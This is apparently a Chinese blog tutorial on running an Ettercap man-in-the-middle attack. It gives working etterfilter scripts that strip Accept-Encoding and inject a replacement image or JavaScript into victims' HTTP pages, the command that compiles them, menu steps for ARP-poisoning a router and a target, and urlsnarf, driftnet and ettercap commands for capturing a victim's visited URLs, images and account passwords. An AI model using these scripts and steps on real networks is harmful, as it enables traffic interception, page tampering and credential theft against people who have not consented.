ettercap中间人攻击
Ettercap中间人攻击
利用 Ettercap0.8.4
图形化工具,ARP欺骗,替换图片。获取密码。获取访问的网址。
编写攻击脚本
替换内容
replace(“xxxx”, “xxxx”)
替换http中的图片
比如换了百度的logo,但这并没有好大意义。
例子如下:
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=https://pic.rmb.bdstatic.com/c86255e8028696139d3e3e4bb44c047b.png");
replace("IMG SRC=", "img src=https://pic.rmb.bdstatic.com/c86255e8028696139d3e3e4bb44c047b.png");
msg("替换图片成功!\n");
}
弹个窗跟打个招呼
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<head>", "<head><script type='text/javascript'>alert('嘿!朋友');</script>");
replace("<HEAD>", "<HEAD><script type='text/javascript'>alert('嘿!朋友');</script>");
msg("替换弹窗成功!\n");
}
然后另存为alert.filter文件
将alert.filter转变为二进制文件
etterfilter alert.filter -o alert.ef
利用ettercap进行中间人攻击
选择网卡 确定(Accept)
打开 Host List
并扫描
添加为 Target
菜单
-> Target
-> Current targets
- 路由器自身添加为
Target1
- 目标添加为
Target2
载入刚才生成的脚本
菜单
-> Filters
-> Load a filter...
选择刚刚生成的二进制文件 点击 ok
开始arp欺骗
MITM 菜单
-> ARP poisoning...
-> OK
开始中间人攻击
其他的攻击
获取目标的网址,图片,账号密码。
获取目标机访问的图片
命令行
urlsnarf -i wlan0
获取目标机访问的图片
命令行
driftnet -i wlan0
获取目标机账号密码
命令行
ettercap -Tq -i wlan0
原文作者: ababwbq
原文链接: https://www.unkaer.cf/ettercap.html
版权声明: 转载请注明出处(必须保留原文作者署名原文链接)